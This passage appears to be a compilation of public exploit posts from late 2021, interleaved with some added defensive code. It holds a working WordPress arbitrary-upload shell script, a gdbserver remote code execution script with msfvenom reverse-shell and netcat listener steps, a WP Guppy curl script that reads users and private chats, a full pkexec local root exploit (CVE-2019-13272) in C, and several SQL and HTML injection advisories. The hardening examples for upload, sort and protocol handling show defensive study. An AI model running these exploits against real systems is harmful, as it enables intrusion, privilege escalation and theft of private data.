# Date: 16/11/2021
# Exploit Author: Keyvan Hardani
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
# Version: <= 1.0.4
# Tested on: Kali Linux

import sys
import time
from os import path

import requests


def banner():
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")


def usage():
    print("Usage: python3 exploit.py [target url] [your shell]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")


def vuln_check(uri):
    # The upload handler is treated as vulnerable unless it rejects the unauthenticated request.
    response = requests.get(uri)
    raw = response.text
    if "No script kiddies please!!" in raw:
        return False
    return True


def main():
    banner()
    if len(sys.argv) != 3:
        usage()
        sys.exit(1)

    base = sys.argv[1]
    file_path = sys.argv[2]
    ajax_action = 'sprw_file_upload_action'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action

    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)
    if not path.isfile(file_path):
        print("(*) Invalid file!")
        sys.exit(1)

    # allowedExtensions[] is read back from the request, so the client decides what is allowed.
    data = {
        "allowedExtensions[0]": "jpg",
        "allowedExtensions[1]": "php4",
        "allowedExtensions[2]": "phtml",
        "allowedExtensions[3]": "png",
        "qqfile": "files",
        "element_id": "6837",
        "sizeLimit": "12000000",
        "file_uploader_nonce": "2b102311b7"
    }

    print("Uploading Shell...")
    with open(file_path, 'rb') as shell:   # binary mode so the file is sent byte for byte
        files = {'files[]': shell}
        response = requests.post(uri, files=files, data=data)

    if "ok" in response.text:
        print("Shell Uploaded!")
        print("Shell URL on your Review/Comment")
    else:
        print("Shell Upload Failed")
        sys.exit(1)


main()
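Added example, not code from either project or from the posts: the two extension-validation mistakes behind the SuiteCRM module (post 4) and the Smart Product Review script above, next to a check that survives both. SuiteCRM compared the log extension case-sensitively, so `.pHp` passed a denylist that stopped `.php`; the review plugin let the request supply `allowedExtensions[]`, so the client simply listed `php4`. The hardened version keeps the allowlist on the server, normalizes the name (basename, NFKC, trailing dots and spaces, lower case) and refuses executable segments anywhere in a multi-extension name. The allowlists and the executable-segment set are assumptions of this example.

```python
import os
import unicodedata

# Server-side allowlists; the request never gets a say in these.
LOG_EXTENSIONS = {"log", "txt"}
UPLOAD_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Segments a PHP-capable web server may hand to the interpreter (Apache AddHandler matches any segment).
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps", "htaccess"}


def normalized_segments(filename: str) -> list:
    """Base name, NFKC-folded, trailing dots/spaces dropped, lower-cased, split on dots."""
    base = os.path.basename(unicodedata.normalize("NFKC", filename)).rstrip(". ")
    return base.lower().split(".")


def vulnerable_log_ext_ok(ext: str) -> bool:
    """Case-sensitive denylist: the SuiteCRM pattern, bypassed by '.pHp'."""
    return ext not in (".php", ".phtml", ".phar")


def log_ext_ok(ext: str) -> bool:
    """Normalized allowlist: only extensions the log writer is meant to produce."""
    segments = normalized_segments("suitecrm." + ext.lstrip("."))
    return len(segments) == 2 and segments[1] in LOG_EXTENSIONS


def vulnerable_upload_ok(filename: str, client_allowed: list) -> bool:
    """Trusting allowedExtensions[] from the request: the Smart Product Review pattern."""
    return filename.rsplit(".", 1)[-1] in client_allowed


def upload_ok(filename: str, client_allowed=None) -> bool:
    """client_allowed is accepted and ignored, so the call site reads like the vulnerable one."""
    segments = normalized_segments(filename)
    if len(segments) < 2 or segments[-1] not in UPLOAD_EXTENSIONS:
        return False
    # 'shell.php4.jpg' ends in an allowed extension but still reaches the interpreter on some servers.
    return not any(segment in EXECUTABLE_SEGMENTS for segment in segments[1:-1])


if __name__ == "__main__":
    print("log ext .pHp  vulnerable:", vulnerable_log_ext_ok(".pHp"), " hardened:", log_ext_ok(".pHp"))
    attacker_list = ["jpg", "php4", "phtml", "png"]
    print("shell.php4    vulnerable:", vulnerable_upload_ok("shell.php4", attacker_list),
          " hardened:", upload_ok("shell.php4", attacker_list))
```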
  8. # Exploit Title: Modbus Slave 7.3.1 - Buffer Overflow (DoS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-19
# Vendor Homepage: https://www.modbustools.com/
# Software Link : https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Tested Version: 7.3.1 < 7.4.2
# Vulnerability Type: Buffer Overflow (DoS) Local
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: Modbus Slave 7.3.1 < 7.4.2 Buffer Overflow

# Steps to reproduce:
# 1. - Download and install Modbus Slave
# 2. - Run the python script and it will create modbus.txt file.
# 3. - Modbus Slave 7.3.1 < 7.4.2
# 4. - Connection -> Connect
# 5. - Paste the characters of txt file Registration Key
# 6. - press "ok" button
# 7. - Crashed

#!/usr/bin/python

exploit = 'A' * 736

try:
    with open("Modbus.txt", "w") as file:
        file.write(exploit)
    print("POC is created")
except OSError:
    print("POC not created")
  9. # Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3
import binascii
import socket
import struct
import sys

help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
  - Victim's gdbserver -> 10.10.10.200:1337
  - Attacker's listener -> 10.10.10.100:4444

1. Generate shellcode with msfvenom:
  $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
  $ nc -nlvp 4444

3. Run the exploit:
  $ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''


def checksum(s: str) -> str:
    # RSP checksum: byte sum modulo 256, always sent as two hex digits
    res = sum(map(ord, s)) % 256
    return f'{res:02x}'


def ack(sock):
    sock.send(b'+')


def send(sock, s: str) -> str:
    # Frame as $<data>#<checksum>, read the reply and acknowledge it
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()


def exploit(sock, payload: str):
    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
    send(sock, '!')

    try:
        # Single-step so the stop reply carries the expedited registers, including the PC
        res = send(sock, 'vCont;s')
        data = res.split(';')[2]
        arch, pc = data.split(':')
    except Exception:
        print('[!] ERROR: Unexpected response. Try again later')
        sys.exit(1)

    if arch == '10':
        print('[+] Found x64 arch')
        # gdbserver run-length-encodes the trailing zero bytes as '0*<n>'; keep the bytes before it
        pc = binascii.unhexlify(pc[:pc.index('0*')])
        pc += b'\0' * (8 - len(pc))
        addr = hex(struct.unpack('<Q', pc)[0])[2:]
        addr = '0' * (16 - len(addr)) + addr
    elif arch == '08':
        print('[+] Found x86 arch')
        pc = binascii.unhexlify(pc)
        pc += b'\0' * (4 - len(pc))
        addr = hex(struct.unpack('<I', pc)[0])[2:]
        addr = '0' * (8 - len(addr)) + addr
    else:
        print('[!] ERROR: Unknown architecture')
        sys.exit(1)

    # The M packet length is in bytes; payload is hex, two characters per byte
    hex_length = hex(len(payload) // 2)[2:]
    print('[+] Sending payload')
    send(sock, f'M{addr},{hex_length}:{payload}')
    send(sock, 'vCont;c')


def main():
    if len(sys.argv) < 3:
        print(help)
        sys.exit(1)

    ip, port = sys.argv[1].split(':')
    file = sys.argv[2]

    try:
        with open(file, 'rb') as f:
            payload = f.read().hex()
    except FileNotFoundError:
        print(f'[!] ERROR: File {file} not found')
        sys.exit(1)

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        print('[+] Connected to target. Preparing exploit')
        exploit(sock, payload)
        print('[*] Pwned!! Check your listener')


if __name__ == '__main__':
    main()
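Added example, not part of the post above and not gdb code: the pieces of the GDB Remote Serial Protocol the script leans on, implemented so they can be checked offline. It frames and verifies `$...#xx` packets (with the two-digit checksum the script needs), expands run-length encoding properly instead of cutting at the first `0*`, parses a `T` stop reply into register values and named fields, picks the program counter with the same x64/x86 heuristic the script uses (register 0x10 is rip, 0x08 is eip), and builds an `M` write packet with the length in bytes. The stop reply is constructed for this example in the field order gdbserver uses for a stepped x86-64 thread.

```python
def rsp_checksum(payload: bytes) -> int:
    """Modulo-256 sum of the payload bytes, as RSP defines it."""
    return sum(payload) % 256


def rsp_frame(payload: bytes) -> bytes:
    """$<payload>#<cs>: the checksum is always two hex digits, so 0x05 is '05', never ' 5'."""
    return b"$" + payload + b"#" + b"%02x" % rsp_checksum(payload)


def rsp_unframe(packet: bytes) -> bytes:
    """Strip the frame and verify the checksum; a stub that fails this check would answer '-'."""
    if len(packet) < 4 or packet[:1] != b"$" or packet[-3:-2] != b"#":
        raise ValueError("not a $...#xx packet")
    payload = packet[1:-3]
    if int(packet[-2:], 16) != rsp_checksum(payload):
        raise ValueError("checksum mismatch")
    return payload


def rsp_frame_is_valid(packet: bytes) -> bool:
    try:
        rsp_unframe(packet)
        return True
    except ValueError:
        return False


def rsp_rle_decode(data: bytes) -> bytes:
    """Expand run-length encoding: 'X*n' means X repeated (ord(n) - 29) more times."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i + 1:i + 2] == b"*" and i + 2 < len(data):
            out.extend(data[i:i + 1] * (1 + data[i + 2] - 29))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def parse_stop_reply(payload: bytes) -> dict:
    """Parse 'T<sig><regno>:<hex>;...;thread:...;' into signal, registers and named fields."""
    if payload[:1] != b"T":
        raise ValueError("not a T stop reply")
    reply = {"signal": int(payload[1:3], 16), "regs": {}, "fields": {}}
    for field in payload[3:].split(b";"):
        if b":" not in field:
            continue
        key, value = field.split(b":", 1)
        value = rsp_rle_decode(value)
        try:
            regno = int(key, 16)          # register fields use the hex register number as key
        except ValueError:
            reply["fields"][key.decode()] = value.decode()
            continue
        reply["regs"][regno] = int.from_bytes(bytes.fromhex(value.decode()), "little")
    return reply


def pc_from_stop_reply(payload: bytes) -> tuple:
    """Same heuristic as the exploit: x86-64 stubs expedite rip (0x10), i386 stubs expedite eip (0x08)."""
    regs = parse_stop_reply(payload)["regs"]
    if 0x10 in regs:
        return "x64", regs[0x10]
    if 0x08 in regs:
        return "x86", regs[0x08]
    raise ValueError("no program counter in stop reply")


def memory_write_packet(addr: int, data: bytes) -> bytes:
    """M<addr>,<length>:<hex>; length counts bytes, i.e. half the number of hex digits."""
    return b"M%x,%x:" % (addr, len(data)) + data.hex().encode()


# Constructed stop reply in the order gdbserver emits it for a stepped x86-64 thread:
# rbp (06), rsp (07) and rip (10) come before the thread id, and the values use RLE.
SAMPLE_STOP_REPLY = rsp_frame(b"T0506:0*,;07:d0b6ffffff7f0* ;10:3a1a400*&;thread:p1234.1234;core:0;")

if __name__ == "__main__":
    payload = rsp_unframe(SAMPLE_STOP_REPLY)
    print(parse_stop_reply(payload))
    print(pc_from_stop_reply(payload))
    print(memory_write_packet(0x401A3A, b"\x90\xcc"))
```

The defensive reading of the same protocol is the part worth remembering: a gdbserver reachable over the network accepts `M` and `vCont` from anyone who can complete this handshake, so it should only ever listen on localhost or inside an SSH tunnel.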
  10. # Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection
# Date: 20/11/2021
# Exploit Author: Ilker Burak ADIYAMAN
# Vendor Homepage: https://aimeos.org
# Software Link: https://aimeos.org/laravel-ecommerce-package
# Version: Aimeos 2021.10 LTS
# Tested on: MacOSX

*Description:*
The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api.

====================
1. SQLi
====================

https://127.0.0.1/default/jsonapi/review?sort=-ctime

The "sort" parameter is vulnerable to SQL injection, reveals table and column names.

step 1 : Copy json api GET request above.
step 2 : Change sort parameter value to --

----------------------------------------------------------------------
Parameter: sort (GET)
    Type: error based
    Title: GET parameter 'sort' appears to be injectable
    Payload: sort=--
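Added example, not part of the post above and not Aimeos code: why a sort parameter is injectable and how to close it. A sort key cannot be bound as a query parameter (it is an identifier, not a value), so the only safe construction maps each token to a column name chosen on the server; `--` then fails validation instead of becoming a SQL comment that produces the error the advisory reads table names from. The column mapping, table layout and sample rows are constructed for this example, and the query runs against an in-memory SQLite table so the ordering can be checked.

```python
import re
import sqlite3

# Sort keys the review listing exposes, mapped to the column the query really orders on.
ALLOWED_SORT = {"ctime": "review.ctime", "mtime": "review.mtime", "rating": "review.rating"}
SORT_TOKEN = re.compile(r"^-?[a-z][a-z0-9_]*$")


class BadSortParameter(ValueError):
    pass


def vulnerable_order_by(sort_param: str) -> str:
    """The interpolation pattern behind the advisory: whatever follows the '-' lands in the SQL."""
    column = sort_param[1:] if sort_param.startswith("-") else sort_param
    direction = "DESC" if sort_param.startswith("-") else "ASC"
    return f"ORDER BY {column} {direction}"


def order_by_clause(sort_param: str, allowed: dict = ALLOWED_SORT) -> str:
    """Allowlisted sort: every comma-separated token must be -?key with key in the mapping."""
    clauses = []
    for token in sort_param.split(","):
        token = token.strip()
        if not SORT_TOKEN.match(token):
            raise BadSortParameter(f"malformed sort token {token!r}")
        key = token.lstrip("-")
        if key not in allowed:
            raise BadSortParameter(f"unknown sort key {key!r}")
        clauses.append(f"{allowed[key]} {'DESC' if token.startswith('-') else 'ASC'}")
    return "ORDER BY " + ", ".join(clauses)


def sort_is_acceptable(sort_param: str) -> bool:
    try:
        order_by_clause(sort_param)
        return True
    except BadSortParameter:
        return False


def query_reviews(sort_param: str) -> list:
    """Run the listing against an in-memory table of constructed rows; return the ids in order."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE review (id INTEGER PRIMARY KEY, rating INTEGER, ctime TEXT, mtime TEXT)")
    con.executemany("INSERT INTO review VALUES (?, ?, ?, ?)", [
        (1, 3, "2021-11-01", "2021-11-05"),
        (2, 5, "2021-11-03", "2021-11-03"),
        (3, 1, "2021-11-02", "2021-11-09"),
    ])
    sql = "SELECT review.id FROM review " + order_by_clause(sort_param)
    return [row[0] for row in con.execute(sql)]


if __name__ == "__main__":
    print(query_reviews("-ctime"))
    print("vulnerable SQL for sort=--:", vulnerable_order_by("--"))
    try:
        query_reviews("--")
    except BadSortParameter as exc:
        print("rejected:", exc)
```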
  11. # Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure
# Exploit Author: Keyvan Hardani
# Date: 22/11/2021
# Vendor Homepage: https://wp-guppy.com/
# Version: up to 1.1
# Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
# Usage ./exploit.sh -h

#!/bin/bash

Help()
{
   # Display Help
   echo "Usage"
   echo
   echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
   echo
   echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"
   echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507"
   echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493"
   echo "-h     Print this Help."
   echo
}

while getopts ":h" option; do
   case $option in
      h) # display Help
         Help
         exit;;
   esac
done

if [ "$1" == 1 ]
then
   # Unauthenticated user listing
   curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
fi

if [ "$1" == 2 ]
then
   # Send a message as any userId to any receiverId, no session required
   curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json' | python -m json.tool
fi

if [ "$1" == 3 ]
then
   # Read the chat history between two users
   curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
fi
  12. # Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)
# Date: 11/22/21
# Exploit Author: Ujas Dhami
# Version: 4.19 - 5.2.1
# Platform: Linux
# Tested on:
# ~ Ubuntu 19.04 kernel 5.0.0-15-generic
# ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
# ~ Kali Linux kernel 4.19.0-kali5-amd64
# CVE: CVE-2019-13272

// ....
// Original discovery and exploit author: Jann Horn
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
// Modified exploit code of: BColes
// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
// ....
// ~ Uses the PolKit_Exec frontend.
// ~ PolKit_Action is branched.
// ~ Search is optimized.
// ~ Trunks attain search priority upon execution.
// ....
// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme
// ujas@kali:~$ ./exploit_traceme
// Welcome to your Arsenal!
// accessing variables...
// execution has reached EOP.
// familiar trunks are been searched ...
// trunk helper found: /usr/sbin/mate-power-backlight-helper
// helper initiated: /usr/sbin/mate-power-backlight-helper
// SUID process is being initiated (/usr/bin/pkexec) ...
// midpid is being traced...
// midpid attached.
// root@kali:/home/ujas#
// ....

/* _GNU_SOURCE must precede every include: it exposes memmem, strchrnul, clone,
 * O_DIRECT, F_SETPIPE_SZ and AT_EMPTY_PATH, all of which are used below. */
#define _GNU_SOURCE
#include <ctype.h>
#include <assert.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <stddef.h>
#include <sys/user.h>
#include <sys/uio.h>      /* struct iovec for PTRACE_GETREGSET / PTRACE_SETREGSET */
#include <linux/elf.h>
#include <stdarg.h>
#include <pwd.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>

#define DEBUG
#ifdef DEBUG
#define dprintf printf
#endif
#define max(a,b) ((a)>(b) ? (a) : (b))

/* evaluate expr; on -1 log the expression text and bail out of the calling function */
#define eff(expr) ({ \
  typeof(expr) __res = (expr); \
  if (__res == -1) { \
    dprintf("[-] Error: %s\n", #expr); \
    return 0; \
  } \
  __res; \
})

struct stat st;
const char *trunk[1024];
const char *trunks_rec[] = {
  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
  "/usr/sbin/mate-power-backlight-helper",
  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
  "/usr/bin/xfpm-power-backlight-helper",
  "/usr/bin/lxqt-backlight_backend",
  "/usr/lib/gsd-backlight-helper",
  "/usr/lib/gsd-wacom-led-helper",
  "/usr/lib/gsd-wacom-oled-helper",
  "/usr/libexec/gsd-wacom-led-helper",
  "/usr/libexec/gsd-wacom-oled-helper",
  "/usr/libexec/gsd-backlight-helper",
};

static int trace_align[2];
static const char *path_exec = "/usr/bin/pkexec";
static const char *path_action = "/usr/bin/pkaction";
static int fd = -1;
static int pipe_stat;
static const char *term_sh = "/bin/bash";
static int mid_succ = 1;
static const char *path_doublealign;

/* printf into a static scratch buffer (not reentrant; callers use the result immediately) */
static char *tdisp(char *fmt, ...)
{
  static char overlayfs[10000];
  va_list ap;
  va_start(ap, fmt);
  vsprintf(overlayfs, fmt, ap);
  va_end(ap);
  return overlayfs;
}

static int middle_main(void *overlayfs)
{
  prctl(PR_SET_PDEATHSIG, SIGKILL);
  pid_t middle = getpid();

  /* our own binary, re-executed later as "stage2" / "stage3" through execveat() */
  fd = eff(open("/proc/self/exe", O_RDONLY));

  pid_t child = eff(fork());
  if (child == 0) {
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    eff(dup2(fd, 42));
    int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));
    char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());
    /* wait until the parent is running the SUID pkexec with euid 0 ... */
    while (1) {
      char overlayfs[1000];
      ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));
      overlayfs[buflen] = '\0';
      if (strstr(overlayfs, threadv)) break;
    }
    /* ... so that PTRACE_TRACEME records root credentials for the tracer (CVE-2019-13272),
     * then exec the SUID binary ourselves: it keeps its privileges under that tracer */
    eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
    execl(path_exec, basename(path_exec), NULL);
    dprintf("SUID execution failed.\n");
    exit(EXIT_FAILURE);
  }

  eff(dup2(fd, 0));
  eff(dup2(trace_align[1], 1));

  struct passwd *pw = getpwuid(getuid());
  if (pw == NULL) {
    dprintf("err: username invalid/failed to fetch username\n");
    exit(EXIT_FAILURE);
  }

  mid_succ = 1;
  execl(path_exec, basename(path_exec), "--user", pw->pw_name, path_doublealign, "--help", NULL);
  mid_succ = 0;
  dprintf("err: pkexec execution failed.\n");
  exit(EXIT_FAILURE);
}

/* at the next syscall stop of pid, write a fake page below the stack and turn the
 * syscall into execveat(exec_fd, "", {arg0, NULL}, {NULL}, AT_EMPTY_PATH) */
static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0)
{
  struct user_regs_struct regs;
  struct iovec exev = { .iov_base = &regs, .iov_len = sizeof(regs) };
  eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
  eff(waitpid(pid, &pipe_stat, 0));
  eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));

  unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;
  struct injected_page {
    unsigned long inj_arse[2];
    unsigned long environment[1];
    char arg0[8];
    char path[1];
  } ipage = {
    .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }
  };
  strcpy(ipage.arg0, arg0);
  for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
    unsigned long pro_d = ((unsigned long *)&ipage)[i];
    eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long), (void*)pro_d));
  }

  /* the registers must be changed before they are written back and the tracee released */
  regs.orig_rax = __NR_execveat;
  regs.rdi = exec_fd;
  regs.rsi = inject_surface + offsetof(struct injected_page, path);
  regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);
  regs.r10 = inject_surface + offsetof(struct injected_page, environment);
  regs.r8 = AT_EMPTY_PATH;
  eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));
  eff(ptrace(PTRACE_DETACH, pid, 0, NULL));
  eff(waitpid(pid, &pipe_stat, 0));
  return 0;
}

static int stag_2(void)
{
  pid_t child = eff(waitpid(-1, &pipe_stat, 0));
  timeexecbuffer(child, 42, "stage3");
  return 0;
}

static int sh_spawn(void)
{
  eff(setresgid(0, 0, 0));
  eff(setresuid(0, 0, 0));
  execlp(term_sh, basename(term_sh), NULL);
  dprintf("err: Shell spawn unsuccessful: %s\n", term_sh);
  exit(EXIT_FAILURE);
}

static int check_env(void)
{
  const char* xdg_session = getenv("XDG_SESSION_ID");
  dprintf("accessing variables...\n");

  if (stat(path_action, &st) != 0) {
    dprintf("err: pkaction not found at %s.\n", path_action);
    exit(EXIT_FAILURE);
  }
  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
    dprintf("warn: PolKit agent not found.\n");
    return 1;
  }
  if (stat("/usr/sbin/getsebool", &st) == 0) {
    if (system("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on") == 0) {
      dprintf("warn: [deny_ptrace] is enabled.\n");
      return 1;
    }
  }
  if (xdg_session == NULL) {
    dprintf("warn: $XDG_SESSION_ID is not set.\n");
    return 1;
  }
  if (stat(path_exec, &st) != 0) {
    dprintf("err: pkexec not found at %s.\n", path_exec);
    exit(EXIT_FAILURE);
  }
  dprintf("execution has reached EOP.\n");
  return 0;
}

/* collect the exec.path of every PolKit action that is implicitly active */
int trunkh()
{
  char cmd[1024];
  snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);

  FILE *fp;
  fp = popen(cmd, "r");
  if (fp == NULL) {
    dprintf("err: Failed to run %s.\n", cmd);
    exit(EXIT_FAILURE);
  }

  char line[1024];
  char buffer[2048];
  int helper_index = 0;
  int useful_action = 0;
  static const char *threadv = "org.freedesktop.policykit.exec.path -> ";
  int needle_length = strlen(threadv);

  while (fgets(line, sizeof(line)-1, fp) != NULL) {
    if (strstr(line, "implicit active:")) {
      if (strstr(line, "yes")) {
        useful_action = 1;
      }
      continue;
    }
    if (useful_action == 0) continue;
    useful_action = 0;

    int length = strlen(line);
    char* found = memmem(&line[0], length, threadv, needle_length);
    if (found == NULL) continue;

    memset(buffer, 0, sizeof(buffer));
    for (int i = 0; found[needle_length + i] != '\n'; i++) {
      if (i >= sizeof(buffer)-1) continue;
      buffer[i] = found[needle_length + i];
    }

    if (stat(&buffer[0], &st) != 0) continue;

    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
        strstr(&buffer[0], "/cpugovctl") != 0 ||
        strstr(&buffer[0], "/package-system-locked") != 0 ||
        strstr(&buffer[0], "/cddistupgrader") != 0) {
      dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);
      continue;
    }

    trunk[helper_index] = strndup(&buffer[0], strlen(buffer));
    helper_index++;
    if (helper_index >= sizeof(trunk)/sizeof(trunk[0])) break;
  }

  pclose(fp);
  return 0;
}

int root_ptraceme()
{
  dprintf("helper initiated: %s\n", path_doublealign);
  eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));
  eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));
  char overlayfs = 0;
  eff(write(trace_align[1], &overlayfs, 1));

  dprintf("SUID process is being initiated (%s) ...\n", path_exec);
  static char stackv[1024*1024];
  pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv), CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
  if (!mid_succ) return 1;

  /* wait until the middle process has become the (unprivileged) PolKit helper */
  while (1) {
    int comm_fd = eff(open(tdisp("/proc/%d/comm", midpid), O_RDONLY));
    char comm[16];
    int buflen = eff(read(comm_fd, comm, sizeof(comm)-1));
    close(comm_fd);
    comm[buflen] = '\0';
    *strchrnul(comm, '\n') = '\0';
    if (strncmp(comm, basename(path_doublealign), 15) == 0) break;
    usleep(100000);
  }

  dprintf("midpid is being traced...\n");
  eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
  eff(waitpid(midpid, &pipe_stat, 0));
  dprintf("midpid attached.\n");

  timeexecbuffer(midpid, 0, "stage2");
  exit(EXIT_SUCCESS);
}

int main(int argc, char **inj_arse)
{
  if (strcmp(inj_arse[0], "stage2") == 0) return stag_2();
  if (strcmp(inj_arse[0],
"stage3") == 0) return sh_spawn(); dprintf("Welcome to your Arsenal!\n"); check_env(); if (argc > 1 && strcmp(inj_arse[1], "check") == 0) { exit(0); } dprintf("efficient trunk is being searched...\n"); trunkh(); for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) { if (trunk[i] == NULL) break; if (stat(trunk[i], &st) == 0) { path_doublealign = trunk[i]; root_ptraceme(); } } dprintf("familiar trunks are been searched ...\n"); for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) { if (stat(trunks_rec[i], &st) == 0) { path_doublealign = trunks_rec[i]; dprintf("trunk helper found: %s\n", path_doublealign); root_ptraceme(); } } return 0; }
  13. # Exploit Title: FLEX 1085 Web 1.6.0 - HTML Injection
# Date: 2021-11-21
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android

Title:
================
FLEX 1085 Web - HTML Injection

Summary:
================
The FLEX 1085 Web appliance is vulnerable to an HTML injection attack that allows the injection of arbitrary HTML code.

Severity Level:
================
5.3 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Vulnerability Disclosure Schedule:
============================
* October 19, 2021: An email was sent to support at 6:08MP.
* November 20, 2021: I didn't get any response from support.
* November 21, 2021: Vulnerability Disclosure

Affected Product:
================
FLEX 1085 Web v1.6.0

Steps to Reproduce:
================
1. Open your browser and search for your device's IP address (http://<IP>).
2. Log in to the device's dashboard and go to "WiFi".
3. Use another device that has an access point and create a Wi-Fi network called "<h1>HTML Injection</h1>" (no double quotes) and activate the access point. (https://prnt.sc/20e4y88)
4. Go back to the FLEX device and when scanning the new WiFi networks, the new network will appear written "HTML Injection" in bold and with a larger font size. (http://prnt.sc/20e51li)
  14. # Exploit Title: Bus Pass Management System 1.0 - 'Search' SQL injection
# Date: 23-11-2021
# Exploit Author: Abhijeet Singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/
# Version: v-1.0 (Default)
# Tested on: macOS Monterey (Version 12.0.1)

*SQL Injection:*
SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data.

*Attack Vector:*
An attacker can compromise the database of the application using some automated (or manual) tools like SQLmap.

*Steps to reproduce:*
1. Open the 'View Pass' page using the following URL: http://127.0.0.1/buspassms/download-pass.php
